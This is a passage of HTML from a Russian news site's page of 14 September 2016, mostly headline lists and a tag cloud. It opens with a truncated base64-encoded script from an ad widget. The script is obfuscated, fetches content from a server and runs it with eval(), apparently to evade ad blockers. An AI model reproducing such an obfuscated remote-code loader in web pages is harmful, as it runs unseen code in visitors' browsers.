bMThdXT0gYVsyMF07ZG9jdW1lbnRbYVsyMl1dW2FbMjFdXShmKTtkW2FbMjNdXT0gIG5ldyBmW2FbMjldXVthWzI4XV0oZyhhWzI0XSsgKChsb2NhdGlvblthWzI1XV09PSBhWzI2XSk/YVsyN106YVsyM10pKSk7aWYoIWMpe2M9IDF9O2RbYVsyM11dW2FbMzBdXT0gZnVuY3Rpb24oZCl7aWYoYz09IDEpe2IoZmFsc2UsYVsxOF0pO2I9IHRydWU7cmV0dXJufWVsc2Uge2lmKGRbYVszM11dW2FbMzRdXSgwLGRbYVszM11dW2FbMzJdXShhWzMxXSkpPT0gYVszNV0pe2UoZFthWzMzXV1bYVszNF1dKGRbYVszM11dW2FbMzJdXShhWzMxXSkrIDEsZFthWzMzXV1bYVs2XV0pKX19fTtmdW5jdGlvbiBpKCl7aWYoIWMpe2MoZmFsc2UsMCk7Yz0gZmFsc2U7cmV0dXJufTt2YXIgYj1kb2N1bWVudFthWzM3XV0oYVszNl0pO2Zvcih2YXIgZj0wO2Y8IGJbYVs2XV07ZisrKXtiW2ZdW2FbMzhdXT0gYVszOV19O3ZhciBlPVtkb2N1bWVudFthWzQwXV1dO2lmKGRvY3VtZW50W2FbNDJdXVthWzQxXV0pe2VbYVsxMF1dKGRvY3VtZW50W2FbNDJdXVthWzQxXV1bYVs0MF1dKX07aWYoIWEpe3JldHVybn07Zm9yKHZhciBmPTA7ZjwgZVthWzZdXTtmKyspe2Zvcih2YXIgZz0wO2c8IGVbZl1bYVs2XV07ZysrKXt2YXIgZD1lW2ZdW2ddO2RbYVs0M11dW2FbNDVdXVthWzQ0XV0oZFthWzQzXV0pfX19ZnVuY3Rpb24gZShiKXt2YXIgZT1oKCk7aWYoIWMpe2MoZmFsc2UsdHJ1ZSxudWxsKTtjPSBmYWxzZX07d2luZG93W2VdPSBkO2I9IGFbNDZdKyBiKyBhWzQ3XSsgZSsgYVs0OF07ZXZhbChiKX1pZihjPT0gMSl7Yj0gZmFsc2U7cmV0dXJufTtkW2FbMjNdXVthWzQ5XV09IGZ1bmN0aW9uKCl7ZFthWzIzXV1bYVs1MV1dKGcoYVs1MF0pKX07ZFthWzIzXV1bYVs1Ml1dPSBmdW5jdGlvbihkKXt2YXIgaD0gbmV3IGZbYVsyOV1dW2FbNTNdXSgpO2hbYVs1Nl1dKGFbNTRdLGcoYVs1NV0pLHRydWUpO2hbYVs1N11dPSBwZXJmb3JtYW5jZVthWzU4XV0oKTtoW2FbNTldXT0gZnVuY3Rpb24oKXtpZighYSl7YigpO3JldHVybn1lbHNlIHtpZihoW2FbNjBdXT09IDQpe2lmKGhbYVs2MV1dPT0gMjAwKXtlKGhbYVs2Ml1dKX1lbHNlIHtpZihjPT0gMSl7cmV0dXJufTtpZihoW2FbNjFdXT09IDApe2lmKGM9PSB0cnVlKXtjKCl9O2lmKChwZXJmb3JtYW5jZVthWzU4XV0oKS0gaFthWzU3XV0pPCA1MCl7aWYoIWEpe2IoMSwwKX1lbHNlIHtpKCl9fX19fX19O2lmKGI9PSAxKXtyZXR1cm59O2hbYVs1MV1dKG51bGwpfX0oYikoKX0pKCk=')));
   
    //
      var x=d.getElementsByTagName(s)[0];
      x.parentNode.insertBefore(o,x);
      })(document,"script");
      </script>
      <!-- RedTram End -->
</div>

      </div>
      
        
          
<div class="new-materials-for-rubric" style="display: none;">
  <div class="proscience-subject">Новое</div>
  <div class="square-flow">
    
  <div class="col3-special" id="square-news433018">
    
<a href="/news/2016/09/14/navalny_kremlin/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/07/18/thumbs/navalny-1807-1_1473850003.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Алексей Навальный и Петр Офицеров" title="Алексей Навальный и Петр Офицеров" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Песков сообщил об отутствии у него сведений об иске Навального в КС
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433012">
    
<a href="/news/2016/09/14/chelsea_manning/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/08/22/thumbs/manning_1473849354.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Брэдли Мэннинг в женской одежде" title="Брэдли Мэннинг в женской одежде" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Челси Мэннинг добилась разрешения на операцию по смене пола
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433008">
    
<a href="/news/2016/09/14/poisonous_weeds/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/12/02/thumbs/01_1473849134.png.0x142_q85_crop_cropsize-190x142.jpg" alt="Дошкольники в детском саду" title="Дошкольники в детском саду" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Челябинский СК проверит случай отравления ребенка в детсаду травой
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433017">
    
<a href="/news/2016/09/14/markin_out/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/06/22/thumbs/markin_1473848943.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Владимир Маркин" title="Владимир Маркин" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      СМИ сообщили об уходе Владимира Маркина из СКР
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433016">
    
<a href="/news/2016/09/14/com3/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/09/10/thumbs/petrov_1473848307.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Николай Петров" title="Николай Петров" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Эксперт Николай Петров: Адмресурс используют из-за отказа от фальсификаций на выборах
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433015">
    
<a href="/news/2016/09/14/shreder_divorce/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/02/05/thumbs/schroder_1473848296.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Герхард Шредер" title="Герхард Шредер" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      СМИ сообщли о разводе Герхарда Шредера
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433014">
    
<a href="/news/2016/09/14/terry_russophobia/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/04/06/thumbs/yout600-450_1473848110.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Выборы в США" title="Выборы в США" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Кремль пожаловался на «махровую русофобию» на выборах в США
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433013">
    
<a href="/news/2016/09/14/mvd_kremlin/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/09/25/thumbs/peskov-2_1473847983.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Дмитрий Песков и Владимир Путин" title="Дмитрий Песков и Владимир Путин" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Пескова поразило количество обнаруженных у Захарова денег
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433010">
    
<a href="/news/2016/09/14/zapad2017/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/09/06/thumbs/drills2_1473846816.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Учения «Кавказ-2016»" title="Учения «Кавказ-2016»" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Новые масштабные стратегические учения пройдут на западе России
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433009">
    
<a href="/news/2016/09/14/fossil_income/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/02/05/thumbs/neften_1473845678.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Добыча нефти" title="Добыча нефти" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      КПРФ предложила раздать россиянам доход от добычи нефти
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433011">
    
<a href="/news/2016/09/14/uefa/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/09/14/thumbs/%D0%A1heferin_1473845162.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Александер Чеферин " title="Александер Чеферин " height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Словенец Александер Чеферин избран президентом УЕФА
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433007">
    
<a href="/news/2016/09/14/eu_system/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/04/29/thumbs/15427838148_18842bcb06_o_1473844577.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Шенгенская зона" title="Шенгенская зона" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Юнкер анонсировал создание базы данных о въезжающих в Евросоюз
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news433005">
    
<a href="/news/2016/09/14/ios10/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/08/30/thumbs/apple600-450_1473843855.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Ночной вид магазина Apple" title="Ночной вид магазина Apple" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      В новой iOS 10 обнаружены сбои в работе
    </h4>
  </div>
</a>

  </div>


  </div>
</div>

        
      
    </div>



<!--END #content-->

  
    
      
        
<div class="right-column ib-col">
  <div class="left-or-right-top-banner-slot"></div>
  <h4 class="subject">Главные новости</h4>

<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2013/09/25/thumbs/peskov-2_1473847983.jpg.88x66_q85.jpg" alt="Дмитрий Песков и Владимир Путин" title="Дмитрий Песков и Владимир Путин" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/14/mvd_kremlin/" class="hover">Пескова поразило количество обнаруженных у Захарова денег</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2014/10/23/thumbs/51_1_1473835578.png.88x66_q85.jpg" alt="Серена и Винус Уильямс" title="Серена и Винус Уильямс" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/14/venus_williams/" class="hover">Теннисистка Уильямс ответила на обвинения в допинге</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/09/14/thumbs/%D0%A1heferin_1473845162.jpg.88x66_q85.jpg" alt="Александер Чеферин " title="Александер Чеферин " class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/14/uefa/" class="hover">Словенец Александер Чеферин избран президентом УЕФА</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/04/06/thumbs/yout600-450_1473848110.jpg.88x66_q85.jpg" alt="Выборы в США" title="Выборы в США" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/14/terry_russophobia/" class="hover">Кремль пожаловался на «махровую русофобию» на выборах в США</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2016/04/04/thumbs/center_obuvi_1473836454.jpg.88x66_q85.jpg" alt="«Центробувь»" title="«Центробувь»" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/14/lomakin/" class="hover">СМИ узнали имя объявленного в розыск главы обувного ритейлера</a>
      </div>
    </div>
  
</div>



  
<div class="archive-calendar"><a href="/news/">Архив новостей</a></div>
<script type="text/javascript">
  function mkday(y,m,d) { return parseInt((new Date(y,m-1,d)).getTime() / 86400000); }
  var politcal_dates = [mkday(2016,9,1),mkday(2016,9,2),mkday(2016,9,3),mkday(2016,9,4),mkday(2016,9,5),mkday(2016,9,6),mkday(2016,9,7),mkday(2016,9,8),mkday(2016,9,9),mkday(2016,9,10),mkday(2016,9,11),mkday(2016,9,12),mkday(2016,9,13),mkday(2016,9,14)].join(',');
  var calendar_type = "news";
</script>

<div id="politcal"></div>

<script charset="utf-8" src="/static/polit/js/politcal.js" type="text/javascript"></script>



  

  <div class="most-read">
  <h4 class="subject">Самое читаемое</h4>
  
<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2013/09/26/thumbs/georgria_1473759484.jpg.88x66_q85.jpg" alt="Михаил Саакашвили" title="Михаил Саакашвили" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/13/deputies_claim/" class="hover">Украинские депутаты подали иск в прокуратуру на Саакашвили</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2013/07/25/thumbs/segalovich-2507-1_1473681891.jpg.88x66_q85.jpg" alt="Илья Сегалович" title="Илья Сегалович" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/13/segalovich/" class="hover">Мемория. Илья Сегалович</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2014/11/21/thumbs/novosti_1473752421.jpg.88x66_q85.jpg" alt="Первый канал. Новости" title="Первый канал. Новости" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/13/first_channel/" class="hover">Первый канал опустился на шестую строчку по месячному охвату аудитории</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/09/11/thumbs/bardin2_1473614411.jpg.88x66_q85.jpg" alt="Гарри Бардину - 75!" title="Гарри Бардину - 75!" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/article/2016/09/11/bardin_75years/" class="hover">Болеро Гарри Бардина</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2016/09/11/thumbs/kirsan_gTMobsJ_1473598633.jpg.88x66_q85.jpg" alt="Кирсан Илюмжинов" title="Кирсан Илюмжинов" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/09/11/kirsan/" class="hover">В Белом доме рассмотрят обращение Илюмжинова</a>
      </div>
    </div>
  
</div>

</div>


  
  <div class="front-right-slot"></div>

  

  
<div class="news-lenta">

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:46</span>
            </span><a href="/news/2016/09/14/navalny_kremlin/" class="hover">Песков сообщил об отутствии у него сведений об иске Навального в КС</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:37</span>
            </span><a href="/news/2016/09/14/chelsea_manning/" class="hover">Челси Мэннинг добилась разрешения на операцию по смене пола</a>
        </div>
    
<div class="news-right-slot2"></div>
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:32</span>
            </span><a href="/news/2016/09/14/poisonous_weeds/" class="hover">Челябинский СК проверит случай отравления ребенка в детсаду травой</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:23</span>
            </span><a href="/news/2016/09/14/markin_out/" class="hover">СМИ сообщили об уходе Владимира Маркина из СКР</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:21</span>
            </span><a href="/news/2016/09/14/com3/" class="hover">Эксперт Николай Петров: Адмресурс используют из-за отказа от фальсификаций на выборах</a>
        </div>
    
    </div>
    

    

<div class="zabveniya-block" style="margin: 15px 0;font-family: Arial, Helvetica, sans-serif;">
<h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF;">ЗАБВЕНИЯ.NET</h4>
<a href="/news/2016/09/14/veniamin/">
  <div style="font-weight: bold;font-family: Arial, Helvetica, sans-serif;">Мемория. Митрополит Вениамин (Федченков)</div>
  
    <img src="/media/photolib/2016/09/13/thumbs/1_1473770062.jpg.0x195_q85_crop_cropsize-260x195_upscale.jpg" alt="Иеромонах Вениамин в парке усадьбы Боратынских. Фото 1900-х гг. " title="Иеромонах Вениамин в парке усадьбы Боратынских. Фото 1900-х гг. " width="240"/>
  
  <div style="font-family: Arial, Helvetica, sans-serif;">14 сентября 1880 года родился митрополит Вениамин, экзарх Московской Патриархии в Америке.</div>
</a>
</div>


    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:18</span>
            </span><a href="/news/2016/09/14/shreder_divorce/" class="hover">СМИ сообщли о разводе Герхарда Шредера</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:15</span>
            </span><a href="/news/2016/09/14/terry_russophobia/" class="hover">Кремль пожаловался на «махровую русофобию» на выборах в США</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:13</span>
            </span><a href="/news/2016/09/14/mvd_kremlin/" class="hover">Пескова поразило количество обнаруженных у Захарова денег</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:54</span>
            </span><a href="/news/2016/09/14/zapad2017/" class="hover">Новые масштабные стратегические учения пройдут на западе России</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:36</span>
            </span><a href="/news/2016/09/14/fossil_income/" class="hover">КПРФ предложила раздать россиянам доход от добычи нефти</a>
        </div>
    

    
    <div class="news-right-slot10"></div>
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:26</span>
            </span><a href="/news/2016/09/14/uefa/" class="hover">Словенец Александер Чеферин избран президентом УЕФА</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:16</span>
            </span><a href="/news/2016/09/14/eu_system/" class="hover">Юнкер анонсировал создание базы данных о въезжающих в Евросоюз</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:13</span>
            </span><a href="/news/2016/09/14/com2/" class="hover">Экспертиза «Полит.ру»: Лидеры стран Центральной Азии копируют методы работы друг друга</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:05</span>
            </span><a href="/news/2016/09/14/ios10/" class="hover">В новой iOS 10 обнаружены сбои в работе</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:04</span>
            </span><a href="/news/2016/09/14/guchigov/" class="hover">Помощник прокурора из Чечни задержан после стрельбы на свадьбе</a>
        </div>
    

    
    
    <div class="news-right-slot"></div>
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:49</span>
            </span><a href="/news/2016/09/14/platini_out/" class="hover">Конгресс УЕФА официально снял Платини с поста президента организации</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:47</span>
            </span><a href="/news/2016/09/14/bastrykin_vk/" class="hover">Бастрыкин завел аккаунты в социальных сетях</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:36</span>
            </span><a href="/news/2016/09/14/genital_mutilation/" class="hover">Прокуратура Дагестана проверит сведения о случаях женского обрезания</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:30</span>
            </span><a href="/news/2016/09/14/aeroexpress/" class="hover">Пассажиров «Аэроэкспресса» обяжут указывать паспортные данные</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:18</span>
            </span><a href="/news/2016/09/14/com1/" class="hover">Эксперт Антон Табах: Комментария ЦБ по ситуации ждут не меньше, чем снижения ставки</a>
        </div>
    
    </div>
    

    
    
    
    <div class="news-right-slot20"></div>
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:13</span>
            </span><a href="/news/2016/09/14/oil30/" class="hover">В Минфине допустили нефть по 30 долларов в ближайшие годы</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:09</span>
            </span><a href="/news/2016/09/14/novikov/" class="hover">Защита Захарченко удивилась новым обнаруженным миллиардам</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:08</span>
            </span><a href="/news/2016/09/14/fired/" class="hover">Васильева уволила автора идеи о лишении ученых степеней через суд</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:45</span>
            </span><a href="/news/2016/09/14/wreckage_examination/" class="hover">СМИ сообщили о неучастии польских экспертов в изучении обломков самолета Качиньского</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:41</span>
            </span><a href="/news/2016/09/14/face_twi/" class="hover">Facebook и Twitter вместе с крупнейшими СМИ будут бороться с дезинформацией</a>
        </div>
    

    
    
    
    
    <div class="news-right-slot25"></div>
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:37</span>
            </span><a href="/news/2016/09/14/media_finance/" class="hover">Минфин предложил снова сократить господдержку СМИ</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:21</span>
            </span><a href="/news/2016/09/14/shimon_peres/" class="hover">Медики оценили состояние экс-президента Израиля после инсульта</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:20</span>
            </span><a href="/news/2016/09/14/auto_industry/" class="hover">Правительство выделило 3,3 млрд рублей российскому автопрому</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:13</span>
            </span><a href="/news/2016/09/14/credits/" class="hover">СМИ: кредиты на поддержку бизнеса утекают в офшоры</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:03</span>
            </span><a href="/news/2016/09/14/lomakin/" class="hover">СМИ узнали имя объявленного в розыск главы обувного ритейлера</a>
        </div>
    
    </div>
    

    
    
    
    
    
    <div class="news-right-slot30"></div>

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:01</span>
            </span><a href="/news/2016/09/14/powers_period/" class="hover">В конституции Туркмении увеличили срок действия полномочий президента</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:49</span>
            </span><a href="/news/2016/09/14/navalny_putin/" class="hover">Навальный обжаловал в Конституционном суде отказ от его иска к Путину </a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:48</span>
            </span><a href="/news/2016/09/14/capital_inflows/" class="hover">ЦБ зафиксировал приток капитала в Россию на 1 млрд долларов</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:47</span>
            </span><a href="/news/2016/09/14/ps_reading/" class="hover">Вероятное погребение еще одного английского короля нашли под автостоянкой</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:46</span>
            </span><a href="/news/2016/09/14/venus_williams/" class="hover">Теннисистка Уильямс ответила на обвинения в допинге</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:29</span>
            </span><a href="/news/2016/09/14/trump_fund/" class="hover">В отношении фонда Трампа начато расследование</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:27</span>
            </span><a href="/news/2016/09/14/account/" class="hover">СМИ сообщили о 300 млн евро на счетах отца Захарченко в Швейцарии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:19</span>
            </span><a href="/news/2016/09/14/shoe_retailer/" class="hover">За хищение крупный суммы у банка объявлен в розыск глава обувной сети</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:04</span>
            </span><a href="/news/2016/09/14/geologist/" class="hover">В Якутии медведь задрал геолога</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">08:55</span>
            </span><a href="/news/2016/09/14/seagull/" class="hover">Стивен Сигал допустил получение российского гражданства</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">08:42</span>
            </span><a href="/news/2016/09/14/obama/" class="hover">Обама обвинил Трампа в подражании Путину</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">08:17</span>
            </span><a href="/news/2016/09/14/avakov/" class="hover">В отношении Арсена Авакова заведено уголовное дело</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">07:26</span>
            </span><a href="/news/2016/09/14/ps_nesophontes/" class="hover">Изучена ДНК вымершего «островного убийцы»</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13.09 21:02</span>
            </span><a href="/news/2016/09/13/peskov_wada/" class="hover">В Кремле заявили о непричастности к взлому базы данных WADA</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13.09 20:50</span>
            </span><a href="/news/2016/09/13/update/" class="hover">Samsung выпустит обновление от перегрева Galaxy Note 7</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13.09 20:49</span>
            </span><a href="/news/2016/09/13/putin_renova/" class="hover">Путину передадут материалы по делу «Реновы»</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13.09 20:25</span>
            </span><a href="/news/2016/09/13/pension_index/" class="hover">Минфин предложил не индексировать пенсии работающим  </a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13.09 20:10</span>
            </span><a href="/news/2016/09/13/usa_clients/" class="hover">МИД РФ призвал США надавить на отказавшиеся от перемирия в Сирии группировки</a>
        </div>
    

    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13.09 19:46</span>
            </span><a href="/news/2016/09/13/lamonov_arrest/" class="hover">Суд продлил арест замглавы управления собственной безопасности СКР</a>
        </div>
    

    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13.09 19:44</span>
            </span><a href="/news/2016/09/13/wada_russia/" class="hover">WADA обвинила хакеров из России во взломе своей системы</a>
        </div>
    
    </div>
    

    
    
    
    
    
    

</div>


  
  
    


  

<div class="tags-cloud">

  

  

  

  

  

  
  <a href="/tag/apple/" class="weight8">Apple</a>
  

  

  

  

  

  

  

  
  <a href="/tag/boeing/" class="weight8">Boeing</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/facebook/" class="weight7">Facebook</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/google/" class="weight7">Google</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/it/" class="weight3">IT</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nato/" class="weight9">NATO</a>
  

  

  

  

  

  
  <a href="/tag/pro-science-video/" class="weight0 macrotag">PRO SCIENCE видео</a>
  

  
  <a href="/tag/proscience-theatre/" class="weight8 force-hi macrotag">ProScience Театр</a>
  

  
  <a href="/tag/pussy-riot/" class="weight8">Pussy Riot</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/twitter/" class="weight7">Twitter</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/railwayincidents/" class="weight7">аварии на железной дороге</a>
  

  

  
  <a href="/tag/aviakatastrofa/" class="weight10 force-hi">авиакатастрофа</a>
  

  

  
  <a href="/tag/australia/" class="weight8">Австралия</a>
  

  
  <a href="/tag/avstriya/" class="weight3">Австрия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/avtoprom/" class="weight9">автопром</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/azerbaijan/" class="weight7">Азербайджан</a>
  

  

  

  

  

  

  

  
  <a href="/tag/akcii-protesta/" class="weight9">акции протеста</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/aleksandr-lukashenko/" class="weight6">Александр Лукашенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

